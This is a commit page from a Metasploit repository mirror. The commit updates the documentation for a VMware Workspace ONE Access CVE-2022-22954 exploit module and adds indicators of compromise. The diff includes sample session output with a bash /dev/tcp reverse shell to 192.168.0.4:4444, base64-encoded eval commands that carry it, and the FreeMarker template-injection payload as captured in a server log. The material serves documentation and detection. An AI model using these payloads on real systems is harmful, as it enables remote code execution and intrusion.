adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add log IOC

Browse Source
This commit is contained in:
William Vu
2022-05-03 02:19:43 -05:00
parent b2994aa8d8
commit 4ea72bb7a7
1 changed files with 14 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
+14 -4
View File
@@ -66,17 +66,27 @@ msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set verbos
verbose => true
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run
[+] bash -c '0<&174-;exec 174<>/dev/tcp/192.168.0.4/4444;sh <&174 >&174 2>&174'
[+] bash -c '0<&159-;exec 159<>/dev/tcp/192.168.0.4/4444;sh <&159 >&159 2>&159'
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing command: bash -c {eval,$({echo,ZWNobyB5dGdJRGVVaVM=}|{base64,-d})}
[*] Executing command: bash -c {eval,$({echo,ZWNobyAzUjNQazhpemd6}|{base64,-d})}
[+] The target is vulnerable.
[*] Executing cmd/unix/reverse_bash (Unix Command)
[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTM4LTtleGVjIDEzODw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEzOCA+JjEzOCAyPiYxMzgn}|{base64,-d})}
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55079) at 2022-05-02 20:17:23 -0500
[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:57862) at 2022-05-03 02:33:24 -0500
id
uid=1001(horizon) gid=1003(www) groups=1003(www),1001(vfabric),1002(pivotal)
uname -a
Linux photon-machine 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux
```
## IOCs
### `/opt/vmware/horizon/workspace/logs/greenbox_web.log`
```
[snip]
2022-05-03 07:33:17,988 WARN (Thread-147) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] <GreenBox> <correlation_id: fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f> <tenant_id: zt1myh6phvlz> <client_ip: 192.168.0.2> <username: > <device_id: > - Additional error info for requestId fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. Login request received with tenant code: zt1myh6phvlz, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException
[snip]
```